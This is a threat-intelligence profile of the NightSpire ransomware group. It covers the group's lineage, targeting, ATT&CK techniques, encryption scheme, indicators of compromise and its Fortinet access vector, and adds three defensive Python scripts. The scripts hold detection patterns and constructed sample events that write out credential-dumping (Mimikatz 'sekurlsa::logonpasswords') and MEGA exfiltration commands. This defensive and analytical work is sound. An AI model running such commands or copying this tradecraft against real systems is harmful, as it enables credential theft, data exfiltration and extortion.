THREAT ACTOR

NightSpire

7.3
THREAT LEVEL
EMERGENCE DATE
Feb 2025
CATEGORY
Closed Group
AFFILIATIONS

Likely rebrand of Rbfs ransomware; operators xdragon128 and cuteliyuan previously affiliated with Paranodeus, CyberVolk, and DarkAssault in 2024

DESCRIPTION

First detected in early 2025, this closed group operates as a likely rebrand of Rbfs ransomware, with rapid expansion affecting numerous organizations across 33 countries. The threat actor predominantly targets SMEs with ransom demands from $150,000 to $2 million, exploiting CVE-2024-55591, a critical FortiOS/FortiProxy authentication bypass, as the primary access vector.

CRITICALITY
Assesses the importance of the potential target, including their size/scale, data's value, and operational impact.
LETHALITY
Evaluates the potential for damage from the attack, including the ability to disrupt operations, cause financial loss, and damage public brand image.
AGGRESSIVENESS
Assesses the psychological and tactical intensity of the group’s behavior, including targeted harassment, violent language, blackmail, and political motives.

Classifications & Affiliations

Type: Closed Group

NightSpire operates as a self-contained group, with all attacks handled in-house from initial access through extortion. Maintaining total control over attacks contrasts with prevalent RaaS models. A March 2025 recruitment attempt on BreachForums, seeking a negotiation specialist in exchange for a 20% profit share, resulted in a permanent platform ban.

Known operators xdragon128 and cuteliyuan maintain direct control, with infrastructure artifacts including hostname XDRAGON-SERVER1 linking to operator usernames. Attribution traces back to predecessor Rbfs ransomware based on shared operators, victim overlap, timeline correlation, and infrastructure continuity.

Current Status: Active operations confirmed through October 2025 with continuous victim postings.

Threat Level: 7.3

Origins and Methodology

The operation evolved from pure data extortion to comprehensive double extortion within weeks of emergence, representing one of the fastest capability transitions observed. What sets the group apart is complete reliance on legitimate tools rather than custom malware development, using MEGACmd, WinSCP, 7-Zip, PowerShell, PsExec, and WMI throughout the attack chain. Unusually, the ransomware does NOT delete Volume Shadow Copies, prioritizing encryption speed over complete recovery prevention.

Critical security failures distinguish this group from mature threat actors. Gmail usage for victim communications alongside privacy-focused services represents a significant tradecraft weakness. Visible infrastructure fingerprints expose Apache, OpenSSL, and PHP versions on the leak site. The hostname XDRAGON-SERVER1 maps directly to operator usernames, creating clear law enforcement opportunities despite rapid scaling.

What is the Evolution of NightSpire Ransomware?
0.1
Formation

First detected in early 2025 conducting data-only operations, the threat actor officially launched its Tor-based data leak site on March 12, 2025. Multiple sources confirm no activity prior to 2025, establishing this as a new emergence rather than a continuation of historical operations. Initial operations focused exclusively on data theft without encryption, rapidly transitioning to full double extortion within weeks.

0.2
EVOLUTION

The initial months following emergence concentrated on establishing infrastructure, including a professional Tor-based leak site with countdown timers and multi-channel communication. The group transitioned from data-only extortion to encryption capabilities, implementing AES-256 and RSA-2048, within weeks. CVE-2024-55591 exploitation became the primary access vector, enabling unauthenticated attackers to gain super-admin privileges on FortiGate appliances.

Around mid-2025, expansion accelerated with geographic diversification across 33 countries spanning North America, Western Europe, Asia-Pacific, the Middle East, and Africa. Linux and ESXi variants were detected in development but not yet widely deployed. Current activity shows a consistent attack tempo with continued victim postings through late 2025, though the BreachForums recruitment ban and poor operational security suggest potential vulnerability to law enforcement disruption.

0.3
Lineage/Connections

The operation traces back to the predecessor Rbfs ransomware group based on four critical evidence categories. Shared operators xdragon128 and cuteliyuan previously promoted Rbfs operations before NightSpire's emergence, with timeline analysis revealing that Rbfs references ceased as NightSpire operations began. Victim overlap identifies at least two leak site victims previously claimed by Rbfs, while infrastructure continuity shows through the hostname XDRAGON-SERVER1 directly linking to an operator username.

Historical connections place xdragon128 in 2024 affiliations with Paranodeus ransomware, CyberVolk, and DarkAssault, though the precise nature of these relationships remains unclear. Tactical connections exist to Storm-1567, UNC4393, and TA2101 based on similar infrastructure and overlapping campaign tactics. A stylistic resemblance to BlackCat/ALPHV in branding and intimidation rhetoric has been noted, with possible inspiration from LockBit and Conti operational tactics.

Which Unique Techniques Does NightSpire Use?

The group employs opportunistic, vulnerability-driven targeting prioritizing organizations with exposed external assets and weak security posture.

TECHNIQUE

DETAILS

Infection Vectors

Primary exploitation of CVE-2024-55591 (FortiOS/FortiProxy authentication bypass) enabling unauthenticated remote attackers to gain super-admin privileges; compromised RDP credentials through brute-forcing; phishing campaigns with malicious attachments; vulnerable VPN appliances and web applications

Target Selection

Opportunistic targeting prioritizing SMEs under 1,000 employees (nearly three-quarters of victims) with vulnerable external-facing systems, unpatched FortiGate firewalls, and high-value data holdings.

Primary geographic focus on United States (over 40% of victims), Taiwan, Hong Kong, and Egypt; sector concentration in manufacturing (over a third), technology services, financial services, healthcare, and professional services

Technical Complexity

Moderate technical execution with fast-moving attacks completing data exfiltration within hours.

Windows-focused targeting with Go (Golang)-based ransomware using modular architecture; Linux and ESXi variants in development but not yet deployed

Key Features & Technical Details

The ransomware employs Go (Golang) programming language with modular architecture enabling switching between encryption routines and portable execution across Windows environments.

FEATURE

DETAILS

Encryption Method

Hybrid AES-256 for file content with RSA-2048 for key protection; dual-mode strategy employing block encryption processing large files in 1MB chunks (targeting .iso, .vhdx, .vmdk, .zip, .vib, .bak, .mdf, .ldf, .flt) with full encryption for all other file types.

Each file receives a unique AES symmetric key, which is encrypted with the attacker's RSA public key and appended to the file tail

File Extension

.nspire appended to all encrypted files

Ransom Note

readme.txt deployed in affected directories with payment instructions

Double Extortion

Data exfiltration via MEGACmd to MEGA cloud storage, WinSCP transfers, and the Rclone utility over asymmetrically encrypted non-C2 protocols, preceding file encryption.

7-Zip compression for staging; documented exfiltration including 1.5TB from healthcare sector

Communication Channels

Tor-based leak site; email channels including ProtonMail, OnionMail, and Gmail (security weakness); Telegram channel; qTox encrypted messaging for negotiations

Deployment Speed

Encryption deployed after data staging completion; estimated dwell time under 28 days.

Block encryption optimization with 1MB chunk processing enables rapid file locking across enterprise networks

Payment Method

Bitcoin and other cryptocurrencies with specific wallet addresses undisclosed; ransom demands ranging from $150,000 to $2,000,000 based on data sensitivity and organization size

Business Model

Closed, non-affiliate group with all attacks handled in-house from initial access through extortion; no public RaaS platform.

March 2025 BreachForums recruitment attempt resulted in permanent platform ban

Activities

Attacks show low-volume but consistent patterns characterized as surgical strikes with a focus on stealth and control. Between March and June 2025, the threat actor claimed responsibility for attacks on numerous organizations across 33 countries. Approximately 25 to 30 confirmed victims posted to the Tor-based leak site represent the non-paying subset, with many victims likely negotiating privately. Activity is confirmed through late 2025 with a continued steady tempo and geographic expansion.

Primary targeting concentrates on United States (over 40% of victims), with secondary focus across Asia-Pacific, Western Europe, Middle East, and Africa.

Which Industries Are Most Vulnerable to NightSpire?

Manufacturing sector experiences highest targeting (over a third), followed by technology and IT services, financial services, healthcare including hospitals, professional and business services, construction, education, retail and wholesale, hospitality, public administration including government entities, transportation and logistics, and real estate.

Modus Operandi

The attack chain employs opportunistic exploitation of vulnerable external assets combined with extensive living-off-the-land binary abuse.

Details

Exploit Public-Facing Application (T1190) through primary exploitation of CVE-2024-55591 targeting FortiOS and FortiProxy authentication bypass in Node.js WebSocket module, enabling unauthenticated remote attackers to gain super-admin privileges via crafted requests to FortiGate firewall administrative interfaces.

Valid Accounts (T1078) using compromised RDP credentials obtained through brute-forcing and credential stuffing.

Phishing (T1566) campaigns deploying malicious attachments and drive-by downloads from compromised websites disguised as browser or security software updates. Additional vectors include exploitation of vulnerable VPN appliances, misconfigured web applications, and unpatched edge devices.

Details

Network Service Discovery (T1046) via Advanced IP Scanner deployment for network mapping and identification of additional targets. File and Directory Discovery (T1083) using Everything.exe, a legitimate Voidtools application, abused for comprehensive file enumeration.

System Information Discovery (T1082) conducting reconnaissance of system configurations, architecture, and security postures. Process Discovery identifying running services, security tools, and backup solutions.

Details

Go-based loaders deployed via phishing and exploitation execute from temporary directories under renamed process names. Legitimate remote access utilities including AnyDesk and similar tools are potentially abused for persistent access. PowerShell scripts and batch files function as the primary execution mechanisms. PsExec serves a dual purpose as a lateral movement tool and a remote command execution utility.

Details

Masquerading (T1036) through renamed processes executing from temporary directories. System Binary Proxy Execution (T1218) via extensive living-off-the-land binary abuse including PowerShell, PsExec, WMI, and cmd.exe blending malicious activity with legitimate system operations.

Obfuscated Files or Information (T1027) employing custom obfuscation routines hindering detection and sandbox analysis.

Indicator Removal (T1070) through selective cleanup operations; notably, the group does NOT delete Volume Shadow Copies, suggesting prioritization of encryption speed over complete recovery prevention. Where shadow copies survive, responders should check them before treating encrypted data as unrecoverable.

Details

OS Credential Dumping (T1003.001) via Mimikatz deployment for LSASS memory credential extraction and domain-level privilege escalation. Unsecured Credentials (T1552) through harvesting of stored credentials, cached authentication data, and credential files from compromised systems. Brute Force attacks targeting RDP services and administrative accounts with weak or default credentials.

Details

Application Layer Protocol (T1071) using Tor-based communication channels for anonymity. Encrypted Channel (T1573) implementing asymmetric encrypted non-C2 protocols to evade intrusion detection systems. Multi-platform coordination via email (ProtonMail, OnionMail, Gmail), Telegram channel, and qTox encrypted messaging.

Details

Remote Desktop Protocol (T1021.001) pivoting for host-to-host movement across compromised networks. SMB/Windows Admin Shares (T1021.002) via PsExec as primary lateral movement tool executing commands remotely via administrative shares. Windows Management Instrumentation (T1047) for remote command execution and lateral propagation. PowerShell remoting enabling script execution across multiple systems simultaneously.

Details

Exfiltration to Cloud Storage (T1567.002) as the primary method via MEGACmd to MEGA cloud storage for large-volume data theft. Exfiltration Over Alternative Protocol (T1048) using WinSCP transfers and the Rclone utility for staged data exfiltration. Exfiltration Over C2 Channel (T1041) through encrypted Tor-proxied transfers.

Archive via Utility (T1560.001) employing 7-Zip for data compression and staging prior to exfiltration, with documented exfiltration volumes including 1.5TB from healthcare sector.

Details

Registry Run Keys (T1547.001) through modifications to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and RunOnce for payload execution on system restart. Scheduled Task/Job (T1053) creating Windows Task Scheduler entries for maintaining persistent access. Image File Execution Options registry manipulation for execution behavior control. Service creation and modification for long-term access maintenance.

Details

System disruption through comprehensive file encryption across networks. Data loss preventing access to critical business files, databases, and backups. Business interruption requiring emergency incident response, forensic investigation, and recovery processes.

Details

Data Encrypted for Impact (T1486) implementing a hybrid AES-256 with RSA-2048 encryption scheme. Block encryption processes large files (.iso, .vhdx, .vmdk, .zip, .vib, .bak, .mdf, .flt, .ldf) in 1MB chunks using the main_EncryptFilev2 function for performance optimization. Full encryption via main_EncryptFilev1 applies to documents and smaller files. Each file receives a unique AES symmetric key, which is encrypted with the attacker's RSA public key and appended to the file tail.

Post-encryption files receive .nspire extension with readme.txt ransom notes placed in affected directories.
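The block-versus-full encryption split above (and in the Encryption Method row earlier) decides how much plaintext may survive inside a large file, which matters for recovery planning. The following Python script is an added example, not code from this profile or from any vendor: it profiles the Shannon entropy of a file in 1MB chunks so an analyst can measure actual encryption coverage instead of assuming it. The 1MB chunk size comes from the profile; the 7.5-bit entropy threshold, the 4 KiB minimum chunk size for classification, the 256-byte tail length inferred from RSA-2048 output size, and the constructed sample file are assumptions.

```python
"""Per-chunk entropy profile of a suspected .nspire file.

Added example, not part of the original profile. The 1 MiB chunk size is the
block size the profile reports; the threshold, the minimum classifiable chunk
size, the 256-byte tail assumption and the sample file are ours.
"""
import math
import os
import tempfile
from collections import Counter

CHUNK = 1 << 20               # 1 MiB, the block size reported in the profile
ENTROPY_THRESHOLD = 7.5       # assumed: above this a chunk looks like ciphertext
MIN_CLASSIFY = 4096           # assumed: smaller chunks give unreliable entropy
RSA_WRAPPED_KEY_LEN = 256     # assumed: RSA-2048 output, the per-file wrapped AES key


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 0.0 for empty input, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def chunk_profile(path, chunk=CHUNK, threshold=ENTROPY_THRESHOLD):
    """Return [(offset, size, entropy, verdict)] where verdict is
    True (looks encrypted), False (looks plaintext) or None (too small to judge)."""
    profile = []
    offset = 0
    with open(path, "rb") as f:
        while True:
            block = f.read(chunk)
            if not block:
                break
            e = shannon_entropy(block)
            verdict = None if len(block) < MIN_CLASSIFY else e >= threshold
            profile.append((offset, len(block), round(e, 3), verdict))
            offset += len(block)
    return profile


def summarize(profile):
    """Coverage = bytes in chunks judged encrypted / total bytes."""
    total = sum(size for _, size, _, _ in profile)
    enc_bytes = sum(size for _, size, _, v in profile if v is True)
    return {
        "chunks": len(profile),
        "encrypted_chunks": sum(1 for *_, v in profile if v is True),
        "plaintext_chunks": sum(1 for *_, v in profile if v is False),
        "unclassified_chunks": sum(1 for *_, v in profile if v is None),
        "coverage": enc_bytes / total if total else 0.0,
    }


def build_sample_file(path):
    """Constructed 3 MiB file: chunks 0 and 2 random (stand-in for ciphertext),
    chunk 1 repetitive text (plaintext), plus a 256-byte random tail standing in
    for the RSA-wrapped key the profile says is appended to each file."""
    text = (b"quarterly report line\n" * (CHUNK // 22 + 1))[:CHUNK]
    with open(path, "wb") as f:
        f.write(os.urandom(CHUNK))
        f.write(text)
        f.write(os.urandom(CHUNK))
        f.write(os.urandom(RSA_WRAPPED_KEY_LEN))


def demo():
    path = os.path.join(tempfile.mkdtemp(), "backup.vmdk.nspire")
    build_sample_file(path)
    return summarize(chunk_profile(path))


if __name__ == "__main__":
    print(demo())
```

The 256-byte tail is reported as unclassified rather than guessed: 256 random bytes rarely exceed about 7.2 bits of entropy because of collisions, so a naive threshold would misreport the wrapped key as plaintext. A coverage well below 1.0 on a large file indicates that unencrypted regions remain and that carving them may be worthwhile.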

Details

Dual-threat double extortion model combining system encryption with data publication threats. Aggressive pressure tactics including payment deadlines as short as 2 days from ransom note delivery, countdown timers on leak site (3 to 90 days depending on victim), and direct emails to employees pressuring organizations. Public shaming via Tor-based leak site featuring victim database with breach dates and data sizes, free download links for some leaked data, and threatening language.

Multi-channel intimidation through Telegram channels, publication of negotiation transcript excerpts for non-compliant victims, and threats to sell data to third parties if ransoms remain unpaid.

Details

Selective indicator removal and log manipulation. Extended sleep intervals between encryption operations to evade real-time detection. Temporary file cleanup and process termination following payload execution.
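Because the chain above relies on legitimate tools rather than custom malware, detection has to key on the sequence of tool use across hosts. The following Python script is an added example, not code from this profile or from any vendor: it maps constructed endpoint events to the techniques the Modus Operandi sections name and reports which attack stages are present. Tool names, paths and technique IDs are from the profile; the event schema (Sysmon-style event IDs 1, 11 and 13 with image, cmd, target and details fields), the regular expressions, the stage labels and the sample events are assumptions.

```python
"""Stage-aware triage of endpoint telemetry for the NightSpire tool chain.

Added example, not part of the original profile. Tool names, paths and
technique IDs come from the profile; the event schema (Sysmon-style IDs
1/11/13), the regexes, the stage labels and the sample events are assumptions.
"""
import re

# (stage, technique, regex applied to the lowercased "image cmd" text)
TOOL_RULES = [
    ("discovery",         "T1046 Network Service Discovery",       r"advanced[_ ]?ip[_ ]?scanner"),
    ("discovery",         "T1083 File and Directory Discovery",    r"\beverything\.exe\b"),
    ("credential-access", "T1003.001 OS Credential Dumping",       r"mimikatz|sekurlsa::"),
    ("lateral-movement",  "T1021.002 SMB/Windows Admin Shares",    r"\bpsexec(64)?\.exe\b"),
    ("lateral-movement",  "T1047 Windows Management Instrumentation",
                          r"\bwmic\.exe\b.*\bprocess\b.*\bcall\b.*\bcreate\b"),
    ("collection",        "T1560.001 Archive via Utility (7-Zip)", r"\b7z[ag]?\.exe\b"),
    ("exfiltration",      "T1567.002 Exfiltration to Cloud Storage (MEGA)", r"megaclient|megacmd|mega-put"),
    ("exfiltration",      "T1048 Exfiltration Over Alternative Protocol", r"\brclone\.exe\b|\bwinscp\.exe\b"),
]
TEMP_EXEC_RE = re.compile(r"^c:\\windows\\temp\\", re.I)  # profile: payloads run from C:\Windows\Temp\
RUN_KEY_RE = re.compile(
    r"^(hklm|hkey_local_machine)\\software\\microsoft\\windows\\currentversion\\run(once)?\\", re.I)
ENCRYPTED_EXT = ".nspire"
RANSOM_NOTE = "readme.txt"


def classify_event(ev):
    """Return a list of (stage, technique, evidence) tuples for one event."""
    hits = []
    host = ev["host"]
    if ev["id"] == 1:  # process creation
        text = f'{ev["image"]} {ev["cmd"]}'.lower()
        for stage, technique, pattern in TOOL_RULES:
            if re.search(pattern, text):
                hits.append((stage, technique, f"{host}: {ev['cmd']}"))
        if TEMP_EXEC_RE.match(ev["image"]):
            hits.append(("defense-evasion", "T1036 Masquerading (execution from C:\\Windows\\Temp)",
                         f"{host}: {ev['image']}"))
    elif ev["id"] == 13:  # registry value set
        if RUN_KEY_RE.match(ev["target"]):
            hits.append(("persistence", "T1547.001 Registry Run Keys",
                         f"{host}: {ev['target']} = {ev['details']}"))
    elif ev["id"] == 11:  # file create
        name = ev["target"].rsplit("\\", 1)[-1].lower()
        if name.endswith(ENCRYPTED_EXT):
            hits.append(("impact", "T1486 Data Encrypted for Impact (.nspire)", f"{host}: {ev['target']}"))
        elif name == RANSOM_NOTE:
            hits.append(("impact", "Ransom note dropped (readme.txt)", f"{host}: {ev['target']}"))
    return hits


def triage(events):
    """Collect hits over a batch of events and list the stages seen, in order."""
    hits = [h for ev in events for h in classify_event(ev)]
    stages = []
    for stage, _, _ in hits:
        if stage not in stages:
            stages.append(stage)
    return {"hits": hits, "stages": stages}


# Constructed sample telemetry (hostnames, paths and commands are invented).
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS-FIN-07", "image": r"C:\Tools\Advanced_IP_Scanner.exe",
     "cmd": "Advanced_IP_Scanner.exe /r 10.0.0.0/24"},
    {"id": 1, "host": "WS-FIN-07", "image": r"C:\Windows\Temp\svchosts.exe", "cmd": "svchosts.exe"},
    {"id": 1, "host": "WS-FIN-07", "image": r"C:\Users\Public\mimikatz.exe",
     "cmd": 'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"'},
    {"id": 1, "host": "WS-FIN-07", "image": r"C:\Windows\Temp\PsExec64.exe",
     "cmd": r"PsExec64.exe \\FS-01 -s cmd /c whoami"},
    {"id": 1, "host": "FS-01", "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmd": r"7z.exe a -p C:\Windows\Temp\stage.7z D:\Shares\Finance"},
    {"id": 1, "host": "FS-01", "image": r"C:\Users\svc\AppData\Local\MEGAcmd\MEGAclient.exe",
     "cmd": r"MEGAclient.exe put C:\Windows\Temp\stage.7z /"},
    {"id": 13, "host": "FS-01", "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Windows\Temp\v7.exe"},
    {"id": 11, "host": "FS-01", "target": r"D:\Shares\Finance\budget.xlsx.nspire"},
    {"id": 11, "host": "FS-01", "target": r"D:\Shares\Finance\readme.txt"},
]

if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    print("stages:", " -> ".join(result["stages"]))
    for stage, technique, evidence in result["hits"]:
        print(f"[{stage}] {technique}: {evidence}")
```

Any single rule here fires on routine administration as well (7-Zip, PsExec and WinSCP are common); the value is in the ordering, since discovery followed by credential dumping, archiving and a cloud upload from the same hosts within hours matches the fast exfiltration the profile describes, and a `.nspire` creation or Run-key write is then a late signal.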

Indicators of Compromise (IOCs)

Technical indicators enable detection and response capabilities across multiple layers including file hashes, network infrastructure, host-based artifacts, and behavioral patterns.

INDICATOR

DETAILS

File Hashes

SHA256: 35cefe4bc4a98ad73dda4444c700aac9f749efde8f9de6a643a57a5b605bd4e7 (primary ransomware payload)
SHA256: e275b8a02bf23b565bdaabadb220b39409eddc6b8253eb04e0f092d697e3b53d (v7.exe payload)
MD5: 0170601e27117e9639851a969240b959
SHA1: 7a4aee1910b84c6715c465277229740dfc73fa39

IP Addresses

14.139.185.60 (C2 infrastructure and WinSCP remote server operations)

Domains/URLs

nspireyzmvapgiwgtuoznlafqvlyz7ey6himtgn5bdvdcowfyto3yryd[.]onion (primary Tor-based data leak site)
a2lyiiaq4n74tlgz4fk3ft4akolapfrzk772dk24iq32cznjsmzpanqd[.]onion (secondary Tor-based data leak site)
nightspireteam.receiver@onionmail.org (email communication)
contact@nightspire-ransomware.com (email communication)
support@nightspire-team.onionmail.org (email communication)
nightspireteam.receiver@gmail.com (email communication)

File Paths

C:\Windows\Temp\ (payload execution from temporary directories)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (registry persistence)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce (registry persistence)

File Extensions

.nspire (appended to encrypted files)
readme.txt (ransom note filename)
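The indicators in the table above cover file hashes, a C2 address, leak-site and e-mail addresses, and host artifacts. The following Python script is an added example, not code from this profile or from any vendor: it sweeps a directory tree for the listed hashes, the .nspire extension and the readme.txt note, and scans log lines for the listed e-mail addresses, onion hostname and IP. Indicator values are taken verbatim from the table; the directory layout, file contents and log lines are constructed for the demonstration.

```python
"""IOC sweep for the NightSpire indicators listed in this profile.

Added example, not the profile's or any vendor's tooling. Indicator values are
from the profile; the sample tree, file contents and log lines are constructed.
"""
import hashlib
import os
import re
import tempfile

KNOWN_HASHES = {
    "35cefe4bc4a98ad73dda4444c700aac9f749efde8f9de6a643a57a5b605bd4e7": "primary ransomware payload (SHA256)",
    "e275b8a02bf23b565bdaabadb220b39409eddc6b8253eb04e0f092d697e3b53d": "v7.exe payload (SHA256)",
    "0170601e27117e9639851a969240b959": "payload (MD5)",
    "7a4aee1910b84c6715c465277229740dfc73fa39": "payload (SHA1)",
}
KNOWN_IPS = {"14.139.185.60": "C2 infrastructure / WinSCP remote server"}
KNOWN_EMAILS = {
    "nightspireteam.receiver@onionmail.org", "contact@nightspire-ransomware.com",
    "support@nightspire-team.onionmail.org", "nightspireteam.receiver@gmail.com",
}
KNOWN_ONIONS = {  # kept defanged as in the profile; refanged before matching
    "nspireyzmvapgiwgtuoznlafqvlyz7ey6himtgn5bdvdcowfyto3yryd[.]onion",
    "a2lyiiaq4n74tlgz4fk3ft4akolapfrzk772dk24iq32cznjsmzpanqd[.]onion",
}
ENCRYPTED_EXT = ".nspire"
RANSOM_NOTE = "readme.txt"
EMAIL_RE = re.compile(r"[\w.+-]+@[\w.-]+\.\w+")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def refang(indicator: str) -> str:
    return indicator.replace("[.]", ".")


def file_digests(path):
    """MD5, SHA1 and SHA256 of a file, read in 1 MiB pieces."""
    hashes = (hashlib.md5(), hashlib.sha1(), hashlib.sha256())
    with open(path, "rb") as f:
        for piece in iter(lambda: f.read(1 << 20), b""):
            for h in hashes:
                h.update(piece)
    return {h.name: h.hexdigest() for h in hashes}


def check_file(path, known_hashes=KNOWN_HASHES):
    """Indicator labels that apply to one file (name-based first, then hash matches)."""
    findings = []
    name = os.path.basename(path).lower()
    if name.endswith(ENCRYPTED_EXT):
        findings.append("encrypted file (.nspire)")
    if name == RANSOM_NOTE:
        findings.append("ransom note (readme.txt)")
    for algo, digest in file_digests(path).items():
        if digest in known_hashes:
            findings.append(f"{algo} match: {known_hashes[digest]}")
    return findings


def sweep_tree(root):
    """Walk a directory; return {relative path: [findings]} for files with hits."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            hits = check_file(full)
            if hits:
                results[os.path.relpath(full, root)] = hits
    return results


def scan_log_lines(lines):
    """Return [(line number, indicator)] for mail, proxy or DNS lines touching known IOCs."""
    hits = []
    onions = {refang(o) for o in KNOWN_ONIONS}
    for n, line in enumerate(lines, 1):
        lowered = line.lower()
        for addr in EMAIL_RE.findall(line):
            if addr.lower() in KNOWN_EMAILS:
                hits.append((n, f"email {addr}"))
        for ip in IP_RE.findall(line):
            if ip in KNOWN_IPS:
                hits.append((n, f"ip {ip} ({KNOWN_IPS[ip]})"))
        for onion in onions:
            if onion in lowered:
                hits.append((n, f"onion {onion}"))
    return hits


# Constructed log lines (hosts, users and sizes are invented).
SAMPLE_LOG_LINES = [
    "2025-06-02T10:14:05Z smtp relay=mx1 from=jdoe@corp.example to=nightspireteam.receiver@gmail.com status=sent",
    "2025-06-02T10:20:41Z proxy src=10.0.5.23 dst=14.139.185.60 dport=443 bytes_out=1583820211",
    "2025-06-02T10:22:09Z proxy src=10.0.5.23 dst=updates.corp.example dport=443 bytes_out=1204",
    "2025-06-02T11:03:55Z dns query=nspireyzmvapgiwgtuoznlafqvlyz7ey6himtgn5bdvdcowfyto3yryd.onion src=10.0.5.23",
]


def build_sample_tree(root):
    """Constructed share with one encrypted file, one note and one untouched file."""
    os.makedirs(os.path.join(root, "Finance"))
    for rel, data in [("Finance/budget.xlsx.nspire", os.urandom(64)),
                      ("Finance/readme.txt", b"constructed placeholder note\n"),
                      ("Finance/notes.txt", b"quarterly notes\n")]:
        with open(os.path.join(root, *rel.split("/")), "wb") as f:
            f.write(data)
    return root


def demo():
    root = build_sample_tree(tempfile.mkdtemp())
    return sweep_tree(root), scan_log_lines(SAMPLE_LOG_LINES)


if __name__ == "__main__":
    files, logs = demo()
    print(files)
    print(logs)
```

Hash matches are the weakest signal in practice, since a rebuilt Go binary changes every digest, so the extension and note checks and the network indicators are kept in the same sweep rather than treated as secondary.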

Exploits and Vulnerabilities

CVE: CVE-2024-55591 (FortiOS/FortiProxy Authentication Bypass)

CVSS: 9.6-9.8

DESCRIPTION: Authentication bypass in the Node.js WebSocket module allowing unauthenticated remote attackers to gain super-admin privileges via crafted requests to FortiGate firewall administrative interfaces.

Additional Attack Vectors: VPN credential brute-forcing with MFA fatigue, RMM platform abuse through MSP compromise, AnyDesk for persistent access, and third-party remote access appliance exploitation.